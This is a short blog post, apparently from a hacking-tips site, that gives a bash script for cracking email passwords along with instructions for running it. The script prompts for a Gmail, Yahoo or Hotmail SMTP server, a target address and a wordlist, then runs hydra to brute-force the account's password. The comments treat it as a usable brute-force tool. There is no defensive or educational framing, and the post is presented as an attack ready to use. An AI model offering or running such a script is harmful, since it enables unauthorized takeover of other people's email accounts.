Skip to main content

Simple Email Password Cracking Script







Copy and paste this code in any text editor and save it as anythin.sh
and then
  • open terminal
  • cd to script Directory -[where the script is placed]-
  • and run command ./anything.sh
  • and fillup further information.



#! /bin/bash

echo Simple Email Cracking Script in bash
echo Written By: Alan Cao
echo NOTE: Make sure you have wordlists!
echo Let us Begin:
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
read smtp
echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist

hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp



heheheh TAke Care

Comments

  1. it didnt work for me cam u help

    ReplyDelete
    Replies
    1. #Hackers #Creed

      bro this is just a bruteforce script..... it uses hydra to brute force the email accounts....u can simply use CLi of hydra to bruteforce if u r facing an problem.....
      thanks n keep visiting .....

      Delete
  2. Super thanks for sharing your knowledge

    ReplyDelete

Post a Comment

Popular posts from this blog

New Working Shopping Site SQLi Dorks

Most Important XSS Cheat Sheet

How to Install Mosh on you Linux ec2 Instance